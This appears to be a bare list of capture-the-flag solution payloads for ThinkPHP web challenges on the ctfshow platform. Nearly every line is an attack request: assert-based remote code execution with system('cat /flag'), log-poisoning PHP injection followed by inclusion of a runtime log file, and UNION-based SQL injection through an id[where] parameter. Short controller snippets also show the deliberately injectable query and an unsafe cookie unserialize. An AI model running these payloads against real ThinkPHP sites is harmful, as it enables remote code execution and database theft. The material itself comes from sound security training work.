GET ?s=Admin/Login/ctfshowLogin
GET ?s=/ctfshow/assert/assert($_POST['shell'])
POST shell=system('cat /flag_is_here')
GET /?s=Home/index/index&n=<?php var_dump(system('cat /fl*')); ?>
/Application/Runtime/Logs/Home/21_§04§_§15§.log
/index.php?showctf=<?php var_dump(system('cat /fl*')); ?>
?id[where]=id=-1 union select 1,group_concat(flag4s),3,4 from flags
public function index($id=1){
$name = M('Users')->where('id='.$id)->find();
$this->show($html);
}
/?id=-1) union select 1,group_concat(flag4s),3,4 from flags#
$user= unserialize(base64_decode(cookie('user')));
if(!$user || $user->id!==$id){
$user = M('Users');
$user->find(intval($id));
cookie('user',base64_encode(serialize($user->data())));
}
$this->show($user->username);
}